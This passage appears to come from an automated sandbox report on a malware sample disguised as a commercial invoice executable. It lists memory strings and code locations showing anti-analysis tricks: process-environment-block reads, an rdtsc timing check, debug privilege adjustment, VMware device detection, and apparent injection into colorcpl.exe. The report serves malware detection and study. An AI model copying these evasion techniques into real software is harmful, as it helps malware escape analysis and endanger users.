          Source: explorer.exe, 00000005.00000000.693537022.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000005.00000000.705475865.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir,,H
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_0019E6DA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_0019EA1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_0019E99F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_0019E9DE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_0019E8EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0493849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04929080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049BB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0493B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0493B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0493B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0493B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04940050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04940050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0494746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04952990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04952581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04952581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04952581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04952581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0494C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04951DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04951DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04951DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049D8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0492B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0492B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0492B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049B41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0493D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0493D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04929100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04929100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04929100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0492AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049AA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04954D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04954D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04954D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04944120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04947D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0494B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0494B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04963D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0492B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0492B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0494C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0494C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0492C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049BFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0493AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0493AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04968EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049DFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04952ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04952AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04925210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04925210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04925210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04925210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0492AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0492AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04943A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0492C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0492C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0492C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04958E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04938A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049DFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0492E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04964A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04964A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049EEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049B4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0494AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0494AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0494AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0494AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0494AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0496927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0493766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04952397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04938794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04931B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04931B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049DD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04954BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04954BAD mov eax, dword ptr fs:[00000030h]
